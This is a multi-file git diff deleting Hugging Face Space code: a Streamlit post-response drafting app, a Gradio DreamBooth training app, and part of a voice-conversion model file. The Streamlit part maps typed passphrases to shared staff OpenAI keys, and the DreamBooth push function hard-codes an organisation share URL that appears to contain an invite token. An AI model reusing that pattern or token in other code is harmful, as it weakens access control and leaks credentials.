Programming Interface) key is like a password that allows you to access certain functions or data from a website or service. Many sites use API keys to identify you and control access to their APIs.') - - st.header('Why do you need an API key?') - st.write('API keys allow sites to track usage and prevent abuse of their services. They help keep things secure. When you request an API key, the site knows the calls are coming from you.') - - image = 'apikeyex.png' - st.header('How to get an OpenAI API key:') - st.write('1. Go to https://platform.openai.com/account/api-keys') - st.write('2. Log in or create an OpenAI account if you do not have one') - st.write('3. Click "Create new secret key" and give your key a name') - st.image(image, caption=None, width=None, use_column_width=None, - clamp=False, channels="RGB", output_format="auto") - st.write('4. Copy the generated API key and keep it private like a password') - - st.header('Using your API key') - st.write('When making calls to the OpenAI API, include your API key in the request headers or parameters to authenticate.') - st.code('headers = {"Authorization": f"Bearer {YOUR_API_KEY}"}') - - st.warning('Treat your API key like a secret! Do not share it publicly.') - - elif page == "Respond to Post": - add_logos() - st.title("Respond to Post") - - left_col, right_col = st.columns(2) - - # Input boxes - - - with right_col: - background_info = st.text_area("Background information on original post (This autopopulates for your reference). The Background information generated by OpenAI's GPT-4.", height = 780, value=st.session_state.background_info if 'background_info' in st.session_state else '', key = 'background_info_key') - - with left_col: - original_post = st.text_area("Paste Original Post Here \n", height=100) - word_limit = st.text_input("Word Limit for Response", placeholder = "Please provide a word limit for the response") - - chat_mdl = None - draft_response = '' - - # Check if the "Submit" button is clicked - if st.button("Submit"): - if st.session_state.api_key: - os.environ["OPENAI_API_KEY"] = st.session_state.api_key - # add condition to check for passphrase to allow use of DSI api key stored in secrets - if (os.environ["OPENAI_API_KEY"] == st.secrets["secret_passphrase"]): - #umang key - os.environ["OPENAI_API_KEY"] = st.secrets["dsi_openai_key"] - elif (os.environ["OPENAI_API_KEY"] == st.secrets["secret_passphrase2"]): - #abbie key - os.environ["OPENAI_API_KEY"] = st.secrets["dsi_openai_key2"] - elif (os.environ["OPENAI_API_KEY"] == st.secrets["secret_passphrase3"]): - #myranda key - os.environ["OPENAI_API_KEY"] = st.secrets["dsi_openai_key3"] - elif (os.environ["OPENAI_API_KEY"] == st.secrets["secret_passphrase4"]): - #jasmine key - os.environ["OPENAI_API_KEY"] = st.secrets["dsi_openai_key4"] - chat_mdl = ChatOpenAI(model_name='gpt-4', temperature=0.1) - - else: - st.warning('Please enter Open AI API Key') - - if chat_mdl is not None: - if user_data is None: - - draft_response, background_text = generate_custom_response(original_post, chat_mdl, "", "", word_limit) - - st.session_state.draft_response = draft_response.content - st.session_state.background_text = background_text - # st.session_state.sources_text = sources_text - st.session_state.background_info = background_text - # st.session_state.sources = sources_text - st.rerun() - else: - - draft_response, background_text = generate_custom_response(original_post, chat_mdl, user_data['principles'], user_data['writing_style'], word_limit) - - st.session_state.draft_response = draft_response.content - st.session_state.background_text = background_text - # st.session_state.sources_text = sources_text - st.session_state.background_info = background_text - # st.session_state.sources = sources_text - st.rerun() - - # Ensure session state variables are initialized - if 'draft_response' not in st.session_state: - st.session_state.draft_response = '' - if 'regenerate_prompt' not in st.session_state: - st.session_state.regenerate_prompt = '' - - # Output from function - response_textarea = st.text_area( - label="Draft Response. Please edit here or prompt suggestions in the box below.", - value=st.session_state.draft_response if 'draft_response' in st.session_state else '', - height=350, - key='draft_response_key' - ) - - # Initialization of the regeneration flag - if 'is_regenerating' not in st.session_state: - st.session_state.is_regenerating = False - - # Check if the app is in the "regeneration" phase - if st.session_state.is_regenerating: - # Display the regenerated response explicitly - regenerate_prompt = st.text_area( - "Request a new draft", - value=st.session_state.regenerate_prompt, - placeholder="You may edit the regenerated draft directly above, or request further changes here.", - height=100, - key='regenerate_prompt_key' - ) - # Reset the regeneration flag - st.session_state.is_regenerating = False - else: - # Normal behavior: display the text area for manual input - regenerate_prompt = st.text_area( - "Request a new draft", - placeholder="You may edit the draft directly above, or request a new draft with additional guidance here.", - height=100, - key='regenerate_prompt_key' - ) - - if (draft_response is not None) and (regenerate_prompt is not None): - if st.button("Regenerate"): - if st.session_state.api_key: - os.environ['OPENAI_API_KEY'] = st.session_state.api_key - # add condition to check for passphrase to allow use of DSI api key stored in secrets - if (os.environ["OPENAI_API_KEY"] == st.secrets["secret_passphrase"]): - #umang key - os.environ["OPENAI_API_KEY"] = st.secrets["dsi_openai_key"] - elif (os.environ["OPENAI_API_KEY"] == st.secrets["secret_passphrase2"]): - #abbie key - os.environ["OPENAI_API_KEY"] = st.secrets["dsi_openai_key2"] - elif (os.environ["OPENAI_API_KEY"] == st.secrets["secret_passphrase3"]): - #myranda key - os.environ["OPENAI_API_KEY"] = st.secrets["dsi_openai_key3"] - elif (os.environ["OPENAI_API_KEY"] == st.secrets["secret_passphrase4"]): - #jasmine key - os.environ["OPENAI_API_KEY"] = st.secrets["dsi_openai_key4"] - chat_mdl = ChatOpenAI( - model_name='gpt-4', temperature=0.1) - - if chat_mdl is not None: - updated_response = regenerate_custom_response( - chat_mdl, regenerate_prompt, st.session_state.draft_response).content - st.session_state.draft_response = updated_response - st.session_state.is_regenerating = False - - st.rerun() - - -elif authentication_status is False: - st.error('Username/password is incorrect') - # added registration module if username/password is incorrect - - try: - if authenticator.register_user('New User Registration', preauthorization=False): - st.success('User Registered Successfully! Please log in above.') - except Exception as e: - st.error(e) - -elif authentication_status is None: - st.warning('Please enter your username and password') - - try: - if authenticator.register_user('New User Registration', preauthorization=False): - st.success('User Registered Successfully! Please log in above.') - except Exception as e: - st.error(e) - - -with open('config.yaml', 'w') as file: - yaml.dump(config, file, default_flow_style=False) - -config_drive.put("config.yaml", path="config.yaml") diff --git a/spaces/victor/dreambooth-training/app.py b/spaces/victor/dreambooth-training/app.py deleted file mode 100644 index 25728e55803278642ca68a4f8da27d72745667aa..0000000000000000000000000000000000000000 --- a/spaces/victor/dreambooth-training/app.py +++ /dev/null @@ -1,340 +0,0 @@ -import gradio as gr -import os -from pathlib import Path -import argparse -import shutil -from train_dreambooth import run_training -from convertosd import convert -from PIL import Image -from slugify import slugify -import requests -import torch -import zipfile -from diffusers import StableDiffusionPipeline - -css = ''' - .instruction{position: absolute; top: 0;right: 0;margin-top: 0px !important} - .arrow{position: absolute;top: 0;right: -110px;margin-top: -8px !important} - #component-4, #component-3, #component-10{min-height: 0} -''' -model_to_load = "multimodalart/sd-fine-tunable" -maximum_concepts = 3 -#Pre download the files even if we don't use it here -StableDiffusionPipeline.from_pretrained(model_to_load) - -def zipdir(path, ziph): - # ziph is zipfile handle - for root, dirs, files in os.walk(path): - for file in files: - ziph.write(os.path.join(root, file), - os.path.relpath(os.path.join(root, file), - os.path.join(path, '..'))) - -def swap_text(option): - mandatory_liability = "You must have the right to do so and you are liable for the images you use, example:" - if(option == "object"): - instance_prompt_example = "cttoy" - freeze_for = 50 - return [f"You are going to train `object`(s), upload 5-10 images of each object you are planning on training on from different angles/perspectives. {mandatory_liability}:", '''''', f"You should name your concept with a unique made up word that has low chance of the model already knowing it (e.g.: `{instance_prompt_example}` here). Images will be automatically cropped to 512x512.", freeze_for] - elif(option == "person"): - instance_prompt_example = "julcto" - freeze_for = 100 - return [f"You are going to train a `person`(s), upload 10-20 images of each person you are planning on training on from different angles/perspectives. {mandatory_liability}:", '''''', f"You should name the files with a unique word that represent your concept (e.g.: `{instance_prompt_example}` here). Images will be automatically cropped to 512x512.", freeze_for] - elif(option == "style"): - instance_prompt_example = "trsldamrl" - freeze_for = 10 - return [f"You are going to train a `style`, upload 10-20 images of the style you are planning on training on. Name the files with the words you would like {mandatory_liability}:", '''''', f"You should name your files with a unique word that represent your concept (e.g.: `{instance_prompt_example}` here). Images will be automatically cropped to 512x512.", freeze_for] - -def count_files(*inputs): - file_counter = 0 - concept_counter = 0 - for i, input in enumerate(inputs): - if(i < maximum_concepts-1): - files = inputs[i] - if(files): - concept_counter+=1 - file_counter+=len(files) - uses_custom = inputs[-1] - type_of_thing = inputs[-4] - if(uses_custom): - Training_Steps = int(inputs[-3]) - else: - if(type_of_thing == "person"): - Training_Steps = file_counter*200*2 - else: - Training_Steps = file_counter*200 - return(gr.update(visible=True, value=f"You are going to train {concept_counter} {type_of_thing}(s), with {file_counter} images for {Training_Steps} steps. This should take around {round(Training_Steps/1.5, 2)} seconds, or {round((Training_Steps/1.5)/3600, 2)} hours. As a reminder, the T4 GPU costs US$0.60 for 1h. Once training is over, don't forget to swap the hardware back to CPU.")) - -def train(*inputs): - if "IS_SHARED_UI" in os.environ: - raise gr.Error("This Space only works in duplicated instances") - if os.path.exists("output_model"): shutil.rmtree('output_model') - if os.path.exists("instance_images"): shutil.rmtree('instance_images') - if os.path.exists("diffusers_model.zip"): os.remove("diffusers_model.zip") - if os.path.exists("model.ckpt"): os.remove("model.ckpt") - file_counter = 0 - for i, input in enumerate(inputs): - if(i < maximum_concepts-1): - if(input): - os.makedirs('instance_images',exist_ok=True) - files = inputs[i+(maximum_concepts*2)] - prompt = inputs[i+maximum_concepts] - if(prompt == "" or prompt == None): - raise gr.Error("You forgot to define your concept prompt") - for j, file_temp in enumerate(files): - file = Image.open(file_temp.name) - width, height = file.size - side_length = min(width, height) - left = (width - side_length)/2 - top = (height - side_length)/2 - right = (width + side_length)/2 - bottom = (height + side_length)/2 - image = file.crop((left, top, right, bottom)) - image = image.resize((512, 512)) - extension = file_temp.name.split(".")[1] - image = image.convert('RGB') - image.save(f'instance_images/{prompt}_({j+1}).jpg', format="JPEG", quality = 100) - file_counter += 1 - - os.makedirs('output_model',exist_ok=True) - uses_custom = inputs[-1] - type_of_thing = inputs[-4] - if(uses_custom): - Training_Steps = int(inputs[-3]) - Train_text_encoder_for = int(inputs[-2]) - else: - Training_Steps = file_counter*200 - if(type_of_thing == "object"): - Train_text_encoder_for=30 - elif(type_of_thing == "person"): - Train_text_encoder_for=60 - elif(type_of_thing == "style"): - Train_text_encoder_for=15 - - class_data_dir = None - stptxt = int((Training_Steps*Train_text_encoder_for)/100) - args_general = argparse.Namespace( - image_captions_filename = True, - train_text_encoder = True, - stop_text_encoder_training = stptxt, - save_n_steps = 0, - pretrained_model_name_or_path = model_to_load, - instance_data_dir="instance_images", - class_data_dir=class_data_dir, - output_dir="output_model", - instance_prompt="", - seed=42, - resolution=512, - mixed_precision="fp16", - train_batch_size=1, - gradient_accumulation_steps=1, - use_8bit_adam=True, - learning_rate=2e-6, - lr_scheduler="polynomial", - lr_warmup_steps = 0, - max_train_steps=Training_Steps, - ) - run_training(args_general) - torch.cuda.empty_cache() - #convert("output_model", "model.ckpt") - #shutil.rmtree('instance_images') - #shutil.make_archive("diffusers_model", 'zip', "output_model") - with zipfile.ZipFile('diffusers_model.zip', 'w', zipfile.ZIP_DEFLATED) as zipf: - zipdir('output_model/', zipf) - torch.cuda.empty_cache() - return [gr.update(visible=True, value=["diffusers_model.zip"]), gr.update(visible=True), gr.update(visible=True), gr.update(visible=True)] - -def generate(prompt): - from diffusers import StableDiffusionPipeline - - pipe = StableDiffusionPipeline.from_pretrained("./output_model", torch_dtype=torch.float16) - pipe = pipe.to("cuda") - image = pipe(prompt).images[0] - return(image) - -def push(model_name, where_to_upload, hf_token): - if(not os.path.exists("model.ckpt")): - convert("output_model", "model.ckpt") - from huggingface_hub import HfApi, HfFolder, CommitOperationAdd - from huggingface_hub import create_repo - model_name_slug = slugify(model_name) - if(where_to_upload == "My personal profile"): - api = HfApi() - your_username = api.whoami(token=hf_token)["name"] - model_id = f"{your_username}/{model_name_slug}" - else: - model_id = f"sd-dreambooth-library/{model_name_slug}" - headers = {"Authorization" : f"Bearer: {hf_token}", "Content-Type": "application/json"} - response = requests.post("https://huggingface.co/organizations/sd-dreambooth-library/share/SSeOwppVCscfTEzFGQaqpfcjukVeNrKNHX", headers=headers) - - images_upload = os.listdir("instance_images") - image_string = "" - instance_prompt_list = [] - previous_instance_prompt = '' - for i, image in enumerate(images_upload): - instance_prompt = image.split("_")[0] - if(instance_prompt != previous_instance_prompt): - title_instance_prompt_string = instance_prompt - instance_prompt_list.append(instance_prompt) - else: - title_instance_prompt_string = '' - previous_instance_prompt = instance_prompt - image_string = f'''{title_instance_prompt_string} -{image_string}![{instance_prompt} {i}](https://huggingface.co/{model_id}/resolve/main/sample_images/{image})''' - readme_text = f'''--- -license: creativeml-openrail-m -tags: -- text-to-image ---- -### {model_name} Dreambooth model trained by {api.whoami(token=hf_token)["name"]} with [Hugging Face Dreambooth Training Space](https://huggingface.co/spaces/multimodalart/dreambooth-training) - -You run your new concept via `diffusers` [Colab Notebook for Inference](https://colab.research.google.com/github/huggingface/notebooks/blob/main/diffusers/sd_dreambooth_inference.ipynb) - -Sample pictures of this concept: -{image_string} -''' - #Save the readme to a file - readme_file = open("README.md", "w") - readme_file.write(readme_text) - readme_file.close() - #Save the token identifier to a file - text_file = open("token_identifier.txt", "w") - text_file.write(', '.join(instance_prompt_list)) - text_file.close() - create_repo(model_id,private=True, token=hf_token) - operations = [ - CommitOperationAdd(path_in_repo="token_identifier.txt", path_or_fileobj="token_identifier.txt"), - CommitOperationAdd(path_in_repo="README.md", path_or_fileobj="README.md"), - CommitOperationAdd(path_in_repo=f"model.ckpt",path_or_fileobj="model.ckpt") - ] - api.create_commit( - repo_id=model_id, - operations=operations, - commit_message=f"Upload the model {model_name}", - token=hf_token - ) - api.upload_folder( - folder_path="output_model", - repo_id=model_id, - token=hf_token - ) - api.upload_folder( - folder_path="instance_images", - path_in_repo="concept_images", - repo_id=model_id, - token=hf_token - ) - return [gr.update(visible=True, value=f"Successfully uploaded your model. Access it [here](https://huggingface.co/{model_id})"), gr.update(visible=True, value=["diffusers_model.zip", "model.ckpt"])] - -def convert_to_ckpt(): - convert("output_model", "model.ckpt") - return gr.update(visible=True, value=["diffusers_model.zip", "model.ckpt"]) - -with gr.Blocks(css=css) as demo: - with gr.Box(): - if "IS_SHARED_UI" in os.environ: - gr.HTML(''' -
      -

      Attention - This Space doesn't work in this shared UI

      -

      For it to work, you have to duplicate the Space and run it on your own profile where a (paid) private GPU will be attributed to it during runtime. As each T4 costs US$0,60/h, it should cost < US$1 to train a model with less than 100 images on default settings!

      - - -
      - ''') - else: - gr.HTML(''' -
      -

      You have successfully cloned the Dreambooth Training Space

      -

      If you haven't already, attribute a T4 GPU to it (via the Settings tab) and run the training below. You will be billed by the minute from when you activate the GPU until when you turn it off.

      -
      - ''') - gr.Markdown("# Dreambooth training") - gr.Markdown("Customize Stable Diffusion by giving it with few-shot examples") - with gr.Row(): - type_of_thing = gr.Dropdown(label="What would you like to train?", choices=["object", "person", "style"], value="object", interactive=True) - - with gr.Row(): - with gr.Column(): - thing_description = gr.Markdown("You are going to train an `object`, upload 5-10 images of the object you are planning on training on from different angles/perspectives. You must have the right to do so and you are liable for the images you use, example:") - thing_image_example = gr.HTML('''''') - things_naming = gr.Markdown("You should name your concept with a unique made up word that has low chance of the model already knowing it (e.g.: `cttoy` here). Images will be automatically cropped to 512x512.") - with gr.Column(): - file_collection = [] - concept_collection = [] - buttons_collection = [] - delete_collection = [] - is_visible = [] - - row = [None] * maximum_concepts - for x in range(maximum_concepts): - ordinal = lambda n: "%d%s" % (n, "tsnrhtdd"[(n // 10 % 10 != 1) * (n % 10 < 4) * n % 10::4]) - if(x == 0): - visible = True - is_visible.append(gr.State(value=True)) - else: - visible = False - is_visible.append(gr.State(value=False)) - - file_collection.append(gr.File(label=f"Upload the images for your {ordinal(x+1)} concept", file_count="multiple", interactive=True, visible=visible)) - with gr.Column(visible=visible) as row[x]: - concept_collection.append(gr.Textbox(label=f"{ordinal(x+1)} concept prompt - use a unique, made up word to avoid collisions")) - with gr.Row(): - if(x < maximum_concepts-1): - buttons_collection.append(gr.Button(value="Add +1 concept", visible=visible)) - if(x > 0): - delete_collection.append(gr.Button(value=f"Delete {ordinal(x+1)} concept")) - - counter_add = 1 - for button in buttons_collection: - if(counter_add < len(buttons_collection)): - button.click(lambda: - [gr.update(visible=True),gr.update(visible=True), gr.update(visible=False), gr.update(visible=True), True, None], - None, - [row[counter_add], file_collection[counter_add], buttons_collection[counter_add-1], buttons_collection[counter_add], is_visible[counter_add], file_collection[counter_add]], queue=False) - else: - button.click(lambda:[gr.update(visible=True),gr.update(visible=True), gr.update(visible=False), True], None, [row[counter_add], file_collection[counter_add], buttons_collection[counter_add-1], is_visible[counter_add]], queue=False) - counter_add += 1 - - counter_delete = 1 - for delete_button in delete_collection: - if(counter_delete < len(delete_collection)+1): - delete_button.click(lambda:[gr.update(visible=False),gr.update(visible=False), gr.update(visible=True), False], None, [file_collection[counter_delete], row[counter_delete], buttons_collection[counter_delete-1], is_visible[counter_delete]], queue=False) - counter_delete += 1 - - - - with gr.Accordion("Custom Settings", open=False): - swap_auto_calculated = gr.Checkbox(label="Use custom settings") - gr.Markdown("If not checked, the number of steps and % of frozen encoder will be tuned automatically according to the amount of images you upload and whether you are training an `object`, `person` or `style` as follows: The number of steps is calculated by number of images uploaded multiplied by 20. The text-encoder is frozen after 10% of the steps for a style, 30% of the steps for an object and is fully trained for persons.") - steps = gr.Number(label="How many steps", value=800) - perc_txt_encoder = gr.Number(label="Percentage of the training steps the text-encoder should be trained as well", value=30) - - type_of_thing.change(fn=swap_text, inputs=[type_of_thing], outputs=[thing_description, thing_image_example, things_naming, perc_txt_encoder], queue=False) - training_summary = gr.Textbox("", visible=False, label="Training Summary") - steps.change(fn=count_files, inputs=file_collection+[type_of_thing]+[steps]+[perc_txt_encoder]+[swap_auto_calculated], outputs=[training_summary], queue=False) - perc_txt_encoder.change(fn=count_files, inputs=file_collection+[type_of_thing]+[steps]+[perc_txt_encoder]+[swap_auto_calculated], outputs=[training_summary], queue=False) - for file in file_collection: - file.change(fn=count_files, inputs=file_collection+[type_of_thing]+[steps]+[perc_txt_encoder]+[swap_auto_calculated], outputs=[training_summary], queue=False) - train_btn = gr.Button("Start Training") - with gr.Box(visible=False) as try_your_model: - gr.Markdown("## Try your model") - with gr.Row(): - prompt = gr.Textbox(label="Type your prompt") - result_image = gr.Image() - generate_button = gr.Button("Generate Image") - with gr.Box(visible=False) as push_to_hub: - gr.Markdown("## Push to Hugging Face Hub") - model_name = gr.Textbox(label="Name of your model", placeholder="Tarsila do Amaral Style") - where_to_upload = gr.Dropdown(["My personal profile", "Public Library"], label="Upload to") - gr.Markdown("[A Hugging Face write access token](https://huggingface.co/settings/tokens), go to \"New token\" -> Role : Write. A regular read token won't work here.") - hf_token = gr.Textbox(label="Hugging Face Write Token") - push_button = gr.Button("Push to the Hub") - result = gr.File(label="Download the uploaded models in the diffusers format", visible=True) - success_message_upload = gr.Markdown(visible=False) - convert_button = gr.Button("Convert to CKPT", visible=False) - - train_btn.click(fn=train, inputs=is_visible+concept_collection+file_collection+[type_of_thing]+[steps]+[perc_txt_encoder]+[swap_auto_calculated], outputs=[result, try_your_model, push_to_hub, convert_button]) - generate_button.click(fn=generate, inputs=prompt, outputs=result_image) - push_button.click(fn=push, inputs=[model_name, where_to_upload, hf_token], outputs=[success_message_upload, result]) - convert_button.click(fn=convert_to_ckpt, inputs=[], outputs=result) -demo.launch() \ No newline at end of file diff --git a/spaces/videfikri/aicover/infer_pack/models.py b/spaces/videfikri/aicover/infer_pack/models.py deleted file mode 100644 index 96165f73644e6fb92d0ffedb4a3c9e1a457cb989..0000000000000000000000000000000000000000 --- a/spaces/videfikri/aicover/infer_pack/models.py +++ /dev/null @@ -1,982 +0,0 @@ -import math, pdb, os -from time import time as ttime -import torch -from torch import nn -from torch.nn import functional as F -from infer_pack import modules -from infer_pack import attentions -from infer_pack import commons -from infer_pack.commons import init_weights, get_padding -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from infer_pack.commons import init_weights -import numpy as np -from infer_pack import commons - - -class TextEncoder256(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(256, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class TextEncoder256Sim(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(256, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - x = self.proj(x) * x_mask - return x, x_mask - - -class ResidualCouplingBlock(nn.Module): - def __init__( - self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0, - ): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append( - modules.ResidualCouplingLayer( - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - mean_only=True, - ) - ) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - def remove_weight_norm(self): - for i in range(self.n_flows): - self.flows[i * 2].remove_weight_norm() - - -class PosteriorEncoder(nn.Module): - def __init__( - self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0, - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN( - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - def remove_weight_norm(self): - self.enc.remove_weight_norm() - - -class Generator(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=0, - ): - super(Generator, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - def forward(self, x, g=None): - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -class SineGen(torch.nn.Module): - """Definition of sine generator - SineGen(samp_rate, harmonic_num = 0, - sine_amp = 0.1, noise_std = 0.003, - voiced_threshold = 0, - flag_for_pulse=False) - samp_rate: sampling rate in Hz - harmonic_num: number of harmonic overtones (default 0) - sine_amp: amplitude of sine-wavefrom (default 0.1) - noise_std: std of Gaussian noise (default 0.003) - voiced_thoreshold: F0 threshold for U/V classification (default 0) - flag_for_pulse: this SinGen is used inside PulseGen (default False) - Note: when flag_for_pulse is True, the first time step of a voiced - segment is always sin(np.pi) or cos(0) - """ - - def __init__( - self, - samp_rate, - harmonic_num=0, - sine_amp=0.1, - noise_std=0.003, - voiced_threshold=0, - flag_for_pulse=False, - ): - super(SineGen, self).__init__() - self.sine_amp = sine_amp - self.noise_std = noise_std - self.harmonic_num = harmonic_num - self.dim = self.harmonic_num + 1 - self.sampling_rate = samp_rate - self.voiced_threshold = voiced_threshold - - def _f02uv(self, f0): - # generate uv signal - uv = torch.ones_like(f0) - uv = uv * (f0 > self.voiced_threshold) - return uv - - def forward(self, f0, upp): - """sine_tensor, uv = forward(f0) - input F0: tensor(batchsize=1, length, dim=1) - f0 for unvoiced steps should be 0 - output sine_tensor: tensor(batchsize=1, length, dim) - output uv: tensor(batchsize=1, length, 1) - """ - with torch.no_grad(): - f0 = f0[:, None].transpose(1, 2) - f0_buf = torch.zeros(f0.shape[0], f0.shape[1], self.dim, device=f0.device) - # fundamental component - f0_buf[:, :, 0] = f0[:, :, 0] - for idx in np.arange(self.harmonic_num): - f0_buf[:, :, idx + 1] = f0_buf[:, :, 0] * ( - idx + 2 - ) # idx + 2: the (idx+1)-th overtone, (idx+2)-th harmonic - rad_values = (f0_buf / self.sampling_rate) % 1 ###%1意味着n_har的乘积无法后处理优化 - rand_ini = torch.rand( - f0_buf.shape[0], f0_buf.shape[2], device=f0_buf.device - ) - rand_ini[:, 0] = 0 - rad_values[:, 0, :] = rad_values[:, 0, :] + rand_ini - tmp_over_one = torch.cumsum(rad_values, 1) # % 1 #####%1意味着后面的cumsum无法再优化 - tmp_over_one *= upp - tmp_over_one = F.interpolate( - tmp_over_one.transpose(2, 1), - scale_factor=upp, - mode="linear", - align_corners=True, - ).transpose(2, 1) - rad_values = F.interpolate( - rad_values.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose( - 2, 1 - ) ####### - tmp_over_one %= 1 - tmp_over_one_idx = (tmp_over_one[:, 1:, :] - tmp_over_one[:, :-1, :]) < 0 - cumsum_shift = torch.zeros_like(rad_values) - cumsum_shift[:, 1:, :] = tmp_over_one_idx * -1.0 - sine_waves = torch.sin( - torch.cumsum(rad_values + cumsum_shift, dim=1) * 2 * np.pi - ) - sine_waves = sine_waves * self.sine_amp - uv = self._f02uv(f0) - uv = F.interpolate( - uv.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose(2, 1) - noise_amp = uv * self.noise_std + (1 - uv) * self.sine_amp / 3 - noise = noise_amp * torch.randn_like(sine_waves) - sine_waves = sine_waves * uv + noise - return sine_waves, uv, noise - - -class SourceModuleHnNSF(torch.nn.Module): - """SourceModule for hn-nsf - SourceModule(sampling_rate, harmonic_num=0, sine_amp=0.1, - add_noise_std=0.003, voiced_threshod=0) - sampling_rate: sampling_rate in Hz - harmonic_num: number of harmonic above F0 (default: 0) - sine_amp: amplitude of sine source signal (default: 0.1) - add_noise_std: std of additive Gaussian noise (default: 0.003) - note that amplitude of noise in unvoiced is decided - by sine_amp - voiced_threshold: threhold to set U/V given F0 (default: 0) - Sine_source, noise_source = SourceModuleHnNSF(F0_sampled) - F0_sampled (batchsize, length, 1) - Sine_source (batchsize, length, 1) - noise_source (batchsize, length 1) - uv (batchsize, length, 1) - """ - - def __init__( - self, - sampling_rate, - harmonic_num=0, - sine_amp=0.1, - add_noise_std=0.003, - voiced_threshod=0, - is_half=True, 